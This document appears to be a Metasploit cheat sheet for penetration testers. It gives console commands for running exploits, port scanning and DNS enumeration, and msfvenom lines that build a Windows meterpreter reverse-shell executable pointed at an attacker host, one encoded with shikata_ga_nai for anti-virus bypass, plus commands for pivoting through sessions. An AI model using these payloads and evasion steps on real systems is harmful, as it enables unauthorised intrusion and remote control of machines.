Metasploit-Cheat-Sheet

Metasploit Cheat Sheet

License: MIT


The Metasploit Project is a computer security project that provides information about vulnerabilities and helps in the development of penetration tests and IDS signatures. Metasploit is a very popular tool used by pentest experts.

Metasploit :

msf > search [regex]
msf > use exploit/[ExploitPath]
msf > set PAYLOAD [PayloadPath]
msf > show options
msf > set [Option] [Value]
msf > exploit 

Useful Auxiliary Modules

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.10.0/24
msf > run

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

msf > use auxiliary/server/socks4
msf > run

msfvenom :

msfvenom is a tool that can be used to generate Metasploit payloads as standalone files and optionally encode them. It replaces the msfpayload and msfencode tools. Run it with '-l payloads' to get a list of payloads.

$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.1.1 LPORT=4444 > met.exe

msfvenom can be used to apply a level of encoding for anti-virus bypass. Run msfvenom with '-l encoders' to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=192.168.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter


Managing Sessions

Multiple Exploitation:
msf > exploit -z
msf > exploit -j
msf > jobs -l
msf > jobs -k [JobID]

Multiple Sessions:
msf > sessions -l
msf > sessions -i [SessionID]
meterpreter > <Ctrl+Z>

or

meterpreter > background

Route through a session: once the route is added, all modules run against the target subnet will be pivoted through this session.

msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]